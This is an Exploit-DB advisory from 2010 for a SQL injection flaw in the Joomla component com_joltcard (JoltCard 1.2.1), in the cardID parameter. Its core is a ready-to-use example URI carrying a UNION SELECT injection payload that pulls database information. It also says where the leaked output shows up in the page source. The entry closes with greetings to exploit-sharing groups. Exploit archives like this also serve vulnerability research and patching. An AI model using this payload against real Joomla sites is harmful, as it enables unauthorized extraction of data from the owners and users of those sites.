Joomla! Component JoltCard 1.2.1 - SQL Injection

EDB-ID:

12269

Author:

Valentin

Type:

webapps

Platform:

PHP

Published:

2010-04-16

# Exploit Title: Joomla Component com_joltcard SQL Injection Vulnerability
# Date: 17.04.2010
# Author: Valentin
# Category: webapps/0day
# Version: unknown
# Tested on: 
# CVE :  
# Code : 


[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
|:: >> General Information 
|:: Advisory/Exploit Title = Joomla Component com_joltcard SQL Injection Vulnerability
|:: Author = Valentin Hoebel
|:: Contact = valentin@xenuser.org
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
|:: >> Product information
|:: Name = com_joltcard
|:: Vendor = JOLT media
|:: Vendor Website = http://jolt.ca/
|:: Affected Version(s) = unknown
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
|:: >> #1 Vulnerability
|:: Type = SQL Injection
|:: Vulnerable Parameter(s) = cardID
|:: Example URI = index.php?option=com_joltcard&Itemid=XX&task=view&cardID=X+AND+1=2+UNION+SELECT+concat(database())--
|:: Selected information gets only displayed within the HTML source code (look at <OBJECT> tag). 
|::
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
|:: >> Additional Information
|:: Advisory/Exploit Published = 17.04.2010
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
|:: >> Misc
|:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
|::
|:: 
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]